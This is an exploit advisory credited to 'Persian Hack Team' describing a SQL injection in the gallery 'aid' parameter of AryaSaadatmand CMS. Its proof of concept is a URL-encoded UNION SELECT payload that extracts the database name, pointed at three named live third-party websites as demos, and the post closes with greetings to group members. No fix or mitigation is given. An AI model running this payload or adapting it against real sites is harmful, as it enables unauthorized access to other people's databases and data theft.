######################
# Exploit Title : AryaSaadatmand CMS SQL Injection
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://saadatmand.link/index.php?p=page&id=8
# Date: 2016/04/30
# Category: [ Webapps ]
# Tested on: [Win /php ]
# Version : Gallery
######################
# PoC:
# GET =>> aid=[SQL]
# Demo :
# http://www.edarantajhiz.com/index.php?p=gallery&ac=album&aid=-142%27%20union%20select%201,2,database%28%29,4,5,6,7,8,9,10%20--+
# http://www.recordchair.com/index.php?p=gallery&ac=album&aid=-136%27%20union%20select%201,2,database%28%29,4,5,6,7,8,9,10%20--+
# http://www.seylandecor.com/index.php?p=gallery&ac=album&aid=-145%27%20union%20select%201,2,database%28%29,4,5,6,7,8,9,10%20--+
#
######################
# Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com)
# Greetz : T3NZOG4N & FireKernel And All Persian Hack Team Members
# Homepage : persian-team.ir
######################